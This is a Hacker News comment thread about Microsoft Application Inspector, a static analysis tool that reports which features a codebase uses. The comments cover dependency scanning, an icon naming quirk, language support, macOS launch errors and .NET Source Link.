
Microsoft Application Inspector - pjmlp
https://github.com/Microsoft/ApplicationInspector
======
gregmac
This looks like something that would be nice to have integrated in nuget.org,
showing the report output for every package/version (and maybe highlighting
deltas across versions).

If you're running this across your own project output, especially for a big
code base, it's definitely not going to be as useful as across each
dependency. For example your app having "analytics services" and "outbound
http connections" might be totally normal, but if a library you're using for
encryption adds those, that would be a concern.

~~~
nickspag
In regards to the first line of your comment, check out
[https://www.fuget.org](https://www.fuget.org). It does exactly that.

~~~
azinman2
Sorry, where's the app inspector output in this?

[https://www.fuget.org/packages/System.Net.Http](https://www.fuget.org/packages/System.Net.Http)
for example doesn't show me all of that.

------
guydalf
Just wanted to introduce myself as the lead developer on the tool. Valid
comments and questions have been dropped here and I've responded to a couple
of them already by posting clarifications below and on the project wiki. Yes
we are thinking of using the tool for repos like NuGet and maybe Github as a
service that automatically identifies detected features for each component.
Stay tuned and keep the ideas coming. Happy to answer any further questions.

~~~
proncton
My team has been desperately searching for something like this. We actually
started the effort to build our own, and were well into the prototyping phase.
You may see some contributions from us in the future.

~~~
guydalf
smile

------
c0restraint
Weird, that first screenshot [0] contains Audible's logo [1] which is an
Amazon company (far right icon in the first row of icons).

It looks like they are repurposing Audible's logo to mean "Dynamic Command
Execution" [2]

[0] [https://user-
images.githubusercontent.com/47648296/72893326-...](https://user-
images.githubusercontent.com/47648296/72893326-9c82c700-3ccd-11ea-8944-9831ea17f3e0.png)

[1] [https://m.media-
amazon.com/images/G/01/audibleweb/arya/navig...](https://m.media-
amazon.com/images/G/01/audibleweb/arya/navigation/audible_logo.2x._V517446980_.png)

[2] [https://user-
images.githubusercontent.com/47648296/71859554-...](https://user-
images.githubusercontent.com/47648296/71859554-2dd62480-30a4-11ea-8ee5-06b2a0d08d24.png)

~~~
xhroot
Heh, the icon is named "audible":

    
    
        "displayName": "Dynamic command execution",
        "detectedIcon": "fab fa-audible"
    

It's probably unintentionally used by an engineer unfamiliar with the product
as audible is more common as a descriptive word than as a brand.

[https://github.com/microsoft/ApplicationInspector/blob/08c91...](https://github.com/microsoft/ApplicationInspector/blob/08c91033526e2fae4c925be31598cc8d8f697bd6/AppInspector/preferences/tagreportgroups.json#L39-L40)

~~~
XaspR8d
Yeah this happens pretty often, though I'm surprised it continues with Font
Awesome's organizational changes: The "fab" prefix is specifically supposed to
communicate that it's an icon from the "Brands" style. (Non-brand icons use
"fas".) If you find yourself using a "fab" icon generically, you might want to
double-check what it's _supposed_ to represent...

~~~
ehsankia
Honestly, a lot of times when I'm doing quick designs, I just open the font
page with all the images and just visually pick any that looks best.
Definitely needed some sort of legal pass before release.

------
nathell
I pointed it at my Clojure project [1]. It correctly inferred [2] that the
project is doing multithreaded network connections, which is nice, especially
given that Clojure's a rather niche language.

It quite confidently pointed out an "App container" category, on grounds of
the repo containing a circleci/config.yml, which is... technically correct, I
guess, but less than useful.

[1]:
[https://github.com/nathell/skyscraper/](https://github.com/nathell/skyscraper/)
[2]: [http://pliki.danieljanus.pl/appinspector-
skyscraper/](http://pliki.danieljanus.pl/appinspector-skyscraper/)

------
dstaley
Just in case anyone's curious what these reports look like, I've uploaded the
reports for curl, grep, and chromium here: [https://gracious-jang-
bc0194.netlify.com/](https://gracious-jang-bc0194.netlify.com/)

------
akavel
I think an important warning should be, that it can maybe to some extent tell
_" what's [for sure] in it"_, but I suspect it definitely shouldn't be used to
verify _" what's NOT in it"_, as in any kind of "security verification".
Meaning, if you want to hide some code/malware snippet from it on purpose, I
assume you'll definitely find a way to do that. And even if not on purpose, it
may still happen accidentally.

------
mitchty
> The tool supports scanning various programming languages including C, C++,
> C#, Java, JavaScript, HTML, Python, Objective-C, Go, Rudy, Powershell and
> more and includes html, json and text output formats with the default being
> an html report similar to the one shown here.

Is Rudy meant to be Ruby?

~~~
mikerg87
Yes - its a typo. There is a pull request for it already.

[https://github.com/Microsoft/ApplicationInspector/pulls](https://github.com/Microsoft/ApplicationInspector/pulls)

------
SloopJon
I don't see any mention of the languages that it recognizes, but a perusal of
some of the JSON files leads me to believe that this handles many different
languages. It seems that it's by way of regular expressions, though, not
language-specific parsing.

~~~
kozhevnikov
Does it support HTML? Can one parse HTML with regex?

~~~
singlow
You can't parse it _properly_ with a Regular Expression, but you can parse it
with regex-like systems. However I doubt it is parsing outright - it only has
to look for certain keywords and patterns that indicate certain behaviors.

~~~
guydalf
Correct. We don't need to parse it per se just look for use of features that
are easy to identify like XmlHttpRequest, Json.Parse use etc.

------
SamuelAdams
I wonder if they could marry this with ILSpy [1]. Basically point it at a
compiled program, de-compile it, then analyze the decompiled code to see what
it's doing. Might be useful in malware analysis and other areas.

[1]:
[https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)

------
wongarsu
I'm simultaneously amused and saddened that even apps released by Microsoft('s
github organization) don't support white-space in paths.

~~~
malkia
It's a big company! Even people are not that consistent! For one, I'm seeing
that the "mono" culture (not sure if pun intended, or not) is going away from
there!

------
neves
I'd love to see the generated output of famous programs like grep, curl or
chromium. It would give a better idea about what it does.

~~~
dstaley
Here you go! [https://gracious-jang-bc0194.netlify.com/](https://gracious-
jang-bc0194.netlify.com/)

~~~
neves
Excellent! Really nice app. Now I understand it a lot better.

------
guydalf
See
[https://github.com/microsoft/ApplicationInspector/wiki/6.-Un...](https://github.com/microsoft/ApplicationInspector/wiki/6.-Understanding-
Results) that answers questions on choice of icons and
[https://github.com/microsoft/ApplicationInspector/wiki/2.1-F...](https://github.com/microsoft/ApplicationInspector/wiki/2.1-Field:-applies_to-\(languages-
support\)) that talks about language support.

------
ocdtrekkie
I could see this as handy when I'm trying to troubleshoot an
opaque/proprietary/legacy application. Things like knowing it's talking to
environment variables or the registry would be a lot of help drilling down
into what it's touching so I know where to look for what's breaking it.

------
guydalf
Good point. At a minimum it should clearly state that while the tool didn't
"find" such a feature it should not be taken as a security reliable result.
See
[https://github.com/microsoft/ApplicationInspector/wiki/6.-Un...](https://github.com/microsoft/ApplicationInspector/wiki/6.-Understanding-
Results)

------
kozhevnikov
Sounds like builtwith.com for codebases. I wonder if one can run it against
all company repos and generate an accurate stackshare.io alternative.

------
whatsmyusername
Unusable on osx. It fires off 20+ notarization errors on run.

~~~
guydalf
Mac Catalina restrictions appear to be the issue which where app launch checks
were relaxed for a bit then made more aggressive very recently. We added an
issue on the app project site to look into whether the app or just .net core
or both need a macOS notice fix but there's a work around discussed here
[https://www.cultofmac.com/672576/cant-launch-your-apps-on-
ma...](https://www.cultofmac.com/672576/cant-launch-your-apps-on-macos-
catalina-heres-the-fix/)

~~~
guydalf
Affects .Net Core 2.1, 3.0, 3.1 -not app specific but workaround exists as
mentioned and is tracked here
[https://github.com/microsoft/ApplicationInspector/issues/123](https://github.com/microsoft/ApplicationInspector/issues/123)

------
julienfr112
What have Ms application Inspector to tell about Ms application Inspector ?

------
InterestBazinga
One thing I'm not a fan of C# is how often library usually lack bundled code
source, while other similar language(eg. Java), you can use "Go to to
Definition" on pretty much any third-party library/anything without hassle.

~~~
throwabdbdndj
This is changing (slowly) for .NET. Nuget packages support something called
Source Link [1] and can embed URLs to Github/Bitbucket/Etc.

IDEs like Visual Studio and Rider can download the code on demand and debug
step-through.

Tons of popular .NET libs (including the Microsoft ones) already support this.

[1] [https://docs.microsoft.com/en-us/dotnet/standard/library-
gui...](https://docs.microsoft.com/en-us/dotnet/standard/library-
guidance/sourcelink)

